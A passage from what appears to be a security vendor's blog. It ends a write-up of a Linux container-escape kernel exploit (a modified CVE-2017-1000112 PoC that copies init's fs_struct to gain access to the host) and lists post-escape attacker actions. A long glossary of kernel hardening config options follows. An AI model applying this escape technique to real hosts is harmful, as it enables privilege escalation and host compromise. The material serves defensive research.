    *(uint64_t *)(task + TASK_FS_OFFSET) =
        ((_copy_fs_struct)(COPY_FS_STRUCT))(*(unsigned long *)(init + TASK_FS_OFFSET));
}
Secondly, we altered the get_root() function already present in Andrey’s POC for CVE-2017-1000112. There are two main changes here:

  • We traverse up the process’ lineage through the real_parent pointer in the task_struct to find the task_struct of init (PID 1)
  • We copy init‘s fs_struct to our task to ensure our new shell has access to the host filesystem.

It’s worth noting that the kernel functions prepare_kernel_cred and commit_creds, which the exploit uses to get root credentials, will also end up setting our task’s user-namespace to that of the host. However, this isn’t actually a change for Docker containers, as by default Docker containers run in the host’s user-namespace.

Full code for the modified exploit to escape the container is available here. Check out the exploit in action below!

In the video, we can see that inside the container, as the ubuntu user, we have a limited view of processes, and indeed the /proc directory is owned by nobody/nogroup – an indication that we are in an unprivileged container. After running the exploit, our prompt still shows us as being inside the ubuntu_lxc_usr container; however, we now have access to the overall host’s file system – we can list processes from outside our container and read the /etc/shadow file, which contains entries from the host and not the container. From this point, there’s no need to even bother with changing namespaces; you have free rein to:

  • Write or overwrite host or other container files (including kubelet configs)
  • Interact with Docker (perhaps pull and launch a new fun privileged container)
  • Inject code or harvest data from processes (host or container) via /proc/pid/mem
  • Load / unload kernel modules

Our exploit has been tested against Ubuntu kernel 4.8.0-34-generic, with containers running in Kubernetes with Docker, and unprivileged containers in a local LXC deployment. Note that you will need to find your own function and struct offsets if you’re trying this for a different kernel version.


The rules governing containers are the same as any other process: some can be bent, and others can be broken. Vulnerabilities and misconfigurations in container-management programs are not the only means by which an attacker can escape a container. And while the security properties of containers should be celebrated, the isolation of container processes should not be treated as a security boundary. This is why it is important to have detection of kernel exploitation in your strategy for defense. Capsule8 provides exploitation detection out-of-the-box, identifying container-escapes and other kernel malfeasance.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Kernel Configuration Glossary

Posted by

In our post “Millions of Binaries Later: a Look Into Linux Hardening in the Wild”, we examined the security properties of different distributions. In the following, we provide a glossary for the security-relevant kernel configuration options discussed in that post (scraped from the Linux Kernel Driver Database).





CONFIG_X86_SMAP

Supervisor Mode Access Prevention (SMAP) is a security feature in newer Intel processors. There is a small performance cost if this is enabled and turned on; there is also a small increase in the kernel size if this is enabled.



CONFIG_STRICT_KERNEL_RWX

If this is set, kernel text and rodata memory will be made read-only, and non-text memory will be made non-executable. This provides protection against certain security exploits (e.g. executing the heap or modifying text).



CONFIG_RANDOMIZE_BASE

In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.



CONFIG_RANDOMIZE_MEMORY

Randomizes the base virtual address of kernel memory sections (physical memory mapping, vmalloc & vmemmap). This security feature makes exploits relying on predictable memory locations less reliable.



CONFIG_STACKPROTECTOR_STRONG

Functions will have the stack-protector canary logic added in any of the following conditions:

  • arrays of any size and type
  • aggregates containing an array of any size and type
  • calls to alloca()
  • local variables that have had their address taken



CONFIG_HARDENED_USERCOPY

This option checks for obviously wrong memory regions when copying memory to/from the kernel (via copy_to_user() and copy_from_user() functions) by rejecting memory ranges that are larger than the specified heap object, span multiple separately allocated pages, are not on the process stack, or are part of the kernel text. This kills entire classes of heap overflow exploits and similar kernel memory exposures.





CONFIG_STRICT_MODULE_RWX

If this is set, module text and rodata memory will be made read-only, and non-text memory will be made non-executable. This provides protection against certain security exploits (e.g. writing to text).



CONFIG_SECURITY

This allows you to choose different security modules to be configured into your kernel.



CONFIG_SECCOMP

This kernel feature is useful for number-crunching applications that may need to compute untrusted bytecode during their execution. By using pipes or other transports made available to the process as file descriptors supporting the read/write syscalls, it's possible to isolate those applications in their own address space using seccomp. Once seccomp is enabled via prctl(PR_SET_SECCOMP), it cannot be disabled and the task is only allowed to execute a few safe syscalls defined by each seccomp mode.



CONFIG_STRICT_DEVMEM

If this option is disabled, you allow userspace (root) access to all of memory, including kernel and userspace memory. Accidental access to this is obviously disastrous, but specific access can be used by people debugging the kernel.



Say Y here if you want to support the /dev/kmem device. The /dev/kmem device is rarely used but can be used for certain kinds of kernel debugging operations. When in doubt, say "N".



The User Mode Instruction Prevention (UMIP) is a security feature in newer Intel processors. If enabled, a general protection fault is issued if the SGDT, SLDT, SIDT, SMSW or STR instructions are executed in user mode. These instructions unnecessarily expose information about the hardware state.



Enable this if you want to use virtually-mapped kernel stacks with guard pages. This causes kernel stack overflows to be caught immediately rather than causing difficult-to-diagnose corruption.



Many kernel heap attacks try to target slab cache metadata and other infrastructure. This option makes minor performance sacrifices to harden the kernel slab allocator against common freelist exploit methods.



Randomizes the freelist order used on creating new pages. This security feature reduces the predictability of the kernel slab allocator against heap overflows.



Detect overflows of buffers in common string and memory functions where the compiler can determine and validate the buffer sizes.



Select this option if the kernel should BUG when it encounters data corruption in kernel memory structures when they get checked for validity.



This is a temporary option that allows missing usercopy whitelists to be discovered via a WARN() to the kernel log instead of rejecting the copy, falling back to non-whitelisted hardened usercopy that checks the slab allocation size instead of the whitelist size. This option will be removed once it seems like all missing usercopy whitelists have been identified and fixed. Booting with "slab_common.usercopy_fallback=Y/N" can change this setting.



This enforces restrictions on unprivileged users reading the kernel syslog via dmesg(8).



This selects Yama which extends DAC support with additional system-wide security settings beyond regular Linux discretionary access controls. Currently available is ptrace scope restriction. Like capabilities this security module stacks with other LSMs. Further information can be found in Documentation/admin-guide/LSM/Yama.rst.



This option enables writing to a selinuxfs node 'disable', which allows SELinux to be disabled at runtime prior to the policy load. SELinux will then remain disabled until the next boot. This option is similar to the selinux=0 boot parameter but is to support runtime disabling of SELinux, e.g. from /sbin/init, for portability across platforms where boot parameters are difficult to employ.



Enable tasks to build secure computing environments defined in terms of Berkeley Packet Filter programs which implement task-defined system call filtering policies.



This debug facility allows ACPI AML methods to be inserted and/or replaced without rebooting the system. For details refer to: Documentation/acpi/method-customizing.txt.



Randomizing heap placement makes heap exploits harder, but it also breaks ancient binaries (including anything libc5 based). This option changes the bootup default to heap randomization disabled, and can be overridden at runtime by setting /proc/sys/kernel/randomize_va_space to 2.



If this option is disabled, you allow userspace (root) access to all io-memory regardless of whether a driver is actively using that range. Accidental access to this is obviously disastrous, but specific access can be used by people debugging kernel drivers.



There will be no vsyscall mapping at all. This will eliminate any risk of ASLR bypass due to the vsyscall fixed address mapping. Attempts to use the vsyscalls will be reported to dmesg so that either old or malicious userspace programs can be identified.



Enable the userfaultfd() system call, which allows page faults to be intercepted and handled in userland.



Say Y here if you want to support kernel live patching. This option has no runtime impact until a kernel "patch" module uses the interface provided by this option to register a patch, causing calls to patched functions to be redirected to new function code contained in the patch module.



Berkeley Packet Filter filtering capabilities are normally handled by an interpreter. This option allows the kernel to generate native code when a filter is loaded into memory. This should speed up packet sniffing (libpcap/tcpdump).



This feature reduces the number of hardware side channels by ensuring that the majority of kernel addresses are not mapped into userspace.



Compile kernel with the retpoline compiler options to guard against kernel-to-user data leaks by avoiding speculative indirect branches. Requires a compiler with -mindirect-branch=thunk-extern support for full protection. The kernel may run slower.



Port to the x86-64 architecture. x86-64 is a 64-bit extension to the classical 32-bit x86 architecture. For details see



Generate a warning if any W+X mappings are found at boot.



This option checks for a stack overrun on calls to schedule(). If the stack end location is found to be overwritten, always panic, as the content of the corrupted region can no longer be trusted. This is to ensure no erroneous behaviour occurs which could result in data corruption or a sporadic crash at a later stage, once the region is examined. The runtime overhead introduced is minimal.



Check modules for valid signatures upon load: the signature is simply appended to the module. For more information see Documentation/admin-guide/module-signing.rst.



Enabling this switches the refcounting infrastructure from a fast unchecked atomic_t implementation to a fully state checked implementation which can be (slightly) slower but provides protections against various use-after-free conditions that can be used in security flaw exploits.



By default the kernel can call many different userspace binary programs through the "usermode helper" kernel interface. Some of these binaries are statically defined, either in the kernel code itself or as a kernel configuration option. However, some of these are dynamically created at runtime or can be modified after the kernel has started up. To provide an additional layer of security, route all of these calls through a single executable that cannot have its name changed.



Map the VDSO to the predictable old-style address too. Say N here if you are running a sufficiently recent glibc version (2.3.3 or later) to remove the high-mapped VDSO mapping and to exclusively use the randomized VDSO.



If you say Y here, it will be possible to plug wrapper-driven binary formats into the kernel. You will like this especially when you use programs that need an interpreter to run, like Java, Python, .NET or Emacs-Lisp. It's also useful if you often run DOS executables under the Linux DOS emulator DOSEMU (read the DOSEMU-HOWTO). Once you have registered such a binary class with the kernel, you can start one of those programs simply by typing in its name at a shell prompt; Linux will automatically feed it to the correct interpreter.



Provides a virtual ELF core file of the live kernel. This can be read with gdb and other ELF tools. No modifications can be made using this mechanism.



Linux can allow user programs to install a per-process x86 Local Descriptor Table (LDT) using the modify_ldt(2) system call. This is required to run 16-bit or segmented code such as DOSEMU or some Wine programs. It is also used by some very old threading libraries.



Kprobes allows you to trap at almost any kernel address and execute a callback function. register_kprobe() establishes a probepoint and specifies the callback. Kprobes is useful for kernel debugging, non-intrusive instrumentation and testing. If in doubt, say "N".



Uprobes is the user-space counterpart to kprobes: they enable instrumentation applications (such as 'perf probe') to establish unintrusive probes in user-space binaries and libraries by executing handler functions when the probes are hit by user-space applications.



debugfs is a virtual file system that kernel developers use to put debugging files into. Enable this option to be able to read and write to these files.



Enable the bpf() system call, which allows eBPF programs and maps to be manipulated via file descriptors.



Support user namespaces. This allows containers, i.e. vservers, to use user namespaces to provide different user info for different servers. If unsure, say N.



Enable the kernel to trace every kernel function. This is done by using a compiler feature to insert a small 5-byte No-Operation instruction at the beginning of every kernel function, which NOP sequence is then dynamically patched into a tracer call when tracing is enabled by the administrator. If it's runtime disabled (the bootup default), then the overhead of the instructions is very small and not measurable even in micro-benchmarks.



This value can be used to select the number of bits to use to determine the random offset to the base address of vma regions resulting from mmap allocations. This value will be bounded by the architecture's minimum and maximum supported values.



Disabling this option eliminates support for BUG and WARN, reducing the size of your kernel image and potentially quietly ignoring numerous fatal conditions. You should only consider disabling this option for embedded systems with no facilities for reporting errors. Just say Y.



Select this to move thread_info off the stack into task_struct. To make this work, an arch will need to remove all thread_info fields except flags and fix any runtime bugs.



Sign all modules during make modules_install. Without this option, modules must be signed manually using the scripts/sign-file tool.



Fill the pages with poison patterns after free_pages() and verify the patterns before alloc_pages. The filling of the memory helps reduce the risk of information leaks from freed data. This does have a potential performance impact if enabled with the "page_poison=1" kernel boot option.



If you say Y here the layouts of structures that are entirely function pointers (and have not been manually annotated with __no_randomize_layout) or structures that have been explicitly marked with __randomize_layout will be randomized at compile-time. This can introduce the requirement of an additional information exposure vulnerability for exploits targeting these structure types.



Enable the suspend to disk (STD) functionality which is usually called "hibernation" in user interfaces. STD checkpoints the system and powers it off; and restores that checkpoint on reboot.



Exports the dump image of crashed kernel in ELF format.





SLUB has extensive debug support features. Disabling these can result in significant savings in code size. This also disables SLUB sysfs support. /sys/slab will not exist and there will be no support for cache validation etc.



Normal TCP/IP networking is open to an attack known as "SYN flooding". This denial-of-service attack prevents legitimate remote users from being able to connect to your computer during an ongoing attack and requires very little work from the attacker who can operate from anywhere on the Internet.



This is the portion of low virtual memory which should be protected from userspace allocation. Keeping a user from writing to low pages can help reduce the impact of kernel NULL pointer bugs.



By saying Y here, the kernel will instrument some kernel code to extract some entropy from both original and artificially created program state. This will help especially embedded systems, where there is normally little 'natural' source of entropy. The cost is some slowdown of the boot process (about 0.5%) and of fork and irq processing.



Enable this to turn on extended checks in the linked-list walking routines.



Enable this to turn on some debug checking for credential management. The additional code keeps track of the number of pointers from task_structs to any given cred struct and checks to see that this number never exceeds the usage count of the cred struct.



Reject unsigned modules or signed modules for which we don't have a key. Without this, such modules will simply taint the kernel.





Any files read through the kernel file reading interface (kernel modules, firmware, kexec images, security policy) can be pinned to the first filesystem used for loading. When enabled, any files that come from other filesystems will be rejected. This is best used on systems without an initrd that have a root filesystem backed by a read-only device such as dm-verity or a CDROM.



Skip the sanity checking on alloc; only fill the pages with poison on free. This reduces some of the overhead of the poisoning feature.



Instead of using the existing poison value fill the pages with zeros. This makes it harder to detect when errors are occurring due to sanitization but the zeroing at free means that it is no longer necessary to write zeros when GFP_ZERO is used on allocation.



For reduced kernel memory fragmentation, slab caches can be merged when they share the same size and other characteristics. This carries a risk of kernel heap overflows being able to overwrite objects from merged caches (and more easily control cache layout), which makes such heap attacks easier for attackers to exploit. By keeping caches unmerged, these kinds of exploits can usually only damage objects in the same cache. To disable merging at runtime, "slab_nomerge" can be passed on the kernel command line.



Say Y here if you want to show the kernel pagetable layout in a debugfs file. This information is only useful for kernel developers who are working in architecture specific areas of the kernel. It is probably not a good idea to enable this feature in a production kernel. If in doubt, say "N".



Say Y here if you want to enable the memory leak detector. The memory allocation/freeing is traced in a way similar to Boehm's conservative garbage collector, the difference being that the orphan objects are not freed but only shown in /sys/kernel/debug/kmemleak. Enabling this feature will introduce an overhead to memory allocations. See Documentation/dev-tools/kmemleak.rst for more details.



kexec is a system call that implements the ability to shut down your current kernel and to start another kernel. It is like a reboot, but it is independent of the system firmware. And like a reboot, you can start any kernel with it, not just Linux.



A pseudo terminal (PTY) is a software device consisting of two halves: a master and a slave. The slave device behaves identically to a physical terminal; the master device is used by a process to read data from and write data to the slave, thereby emulating a terminal. Typical programs for the master side are telnet servers and xterms.



Include code to run legacy 32-bit programs under a 64-bit kernel. You should likely turn this on unless you're 100% sure that you don't have any 32-bit programs left.



Various /proc files exist to monitor process memory utilization: /proc/pid/smaps, /proc/pid/clear_refs, /proc/pid/pagemap, /proc/kpagecount and /proc/kpageflags. Disabling these interfaces will reduce the size of the kernel by approximately 4kb.



This plugin zero-initializes any structures containing a __user attribute. This can prevent some classes of information exposures.



Zero initialize any struct type local variable that may be passed by reference without having been initialized.



Enable this to turn on checks on scatter-gather tables. This can help find problems with drivers that do not properly initialize their sg tables.



Boot with debugging on by default. SLUB boots by default with the runtime debug capabilities switched off. Enabling this is equivalent to specifying the "slub_debug" parameter on boot. There is no support for more fine-grained debug control as is possible with slub_debug=xxx. SLUB debugging may be switched off in a kernel built with SLUB_DEBUG_ON by specifying "slub_debug=-".



Support for INET (TCP, DCCP, etc.) socket monitoring interface used by native Linux tools such as ss. ss is included in iproute2, currently downloadable at:



Include code to run binaries for the x32 native 32-bit ABI for 64-bit processors. An x32 process gets access to the full 64-bit register file and wide data path while leaving pointers at 32 bits for smaller memory footprint.



This option enables the uselib syscall, a system call used in the dynamic linker from libc5 and earlier. glibc does not use this system call. If you intend to run programs built on libc5 or earlier, you may need to enable this syscall. Current systems running glibc can safely disable this.



Enables additional kernel features for the sake of checkpoint/restore. In particular, it adds auxiliary prctl codes to set up process text, data and heap segment sizes, and a few additional /proc filesystem entries.



This option enables memory changes tracking by introducing a soft-dirty bit on pte-s. This bit is set when someone writes into a page, just as the regular dirty bit, but unlike the latter it can be cleared by hand.



Mmiotrace traces Memory Mapped I/O access and is meant for debugging and reverse engineering. It is called from the ioremap implementation and works via page faults. Tracing is disabled by default and can be enabled at run-time.



This is the new version of the kexec system call. This system call is file based and takes file descriptors for the kernel and initramfs as arguments, as opposed to the list of segments accepted by the previous system call.



Enable this to turn on sanity checking for notifier call chains. This is most useful for kernel developers to make sure that modules properly unregister themselves from notifier chains. This is a relatively cheap check, but if you care about maximum performance, say N.



This option enables code in zsmalloc to collect various statistics about what's happening in zsmalloc and export that information to userspace via debugfs. If unsure, say N.



This keeps track of what call chain is the owner of a page, and may help to find bare alloc_page(s) leaks. Even if you include this feature in your build, it is disabled by default. You should pass "page_owner=on" as a boot parameter to enable it. Eats a fair amount of memory if enabled. See tools/vm/page_owner_sort.c for a user-space helper.



A.out (Assembler.OUTput) is a set of formats for libraries and executables used in the earliest versions of UNIX. Linux used the a.out formats QMAGIC and ZMAGIC until they were replaced with the ELF format.



Datagram Congestion Control Protocol (RFC 4340)



Stream Control Transmission Protocol



Say Y here if you want to support the /dev/port device. The /dev/port device is similar to /dev/mem but for I/O ports.



This option provides the ability to inject artificial errors to specified notifier chain callbacks. It is useful to test the error handling of notifier call chain failures.



This option provides functionality to upgrade arbitrary ACPI tables via initrd. No functional change if no ACPI tables are passed via initrd, therefore it's safe to say Y. See Documentation/acpi/initrd_table_override.txt for details.



EINJ provides a hardware error injection mechanism; it is mainly used for debugging and testing the other parts of APEI and some other RAS features.



Say Y here to enable the extended profiling support mechanisms used by profilers such as OProfile.



GCC plugins are loadable modules that provide extra features to the compiler. They are useful for runtime instrumentation and static analysis.



This is a dumb module for testing mmiotrace. It is very dangerous as it will write garbage to IO memory starting at a given address. However it should be safe to use on e.g. unused portion of VRAM.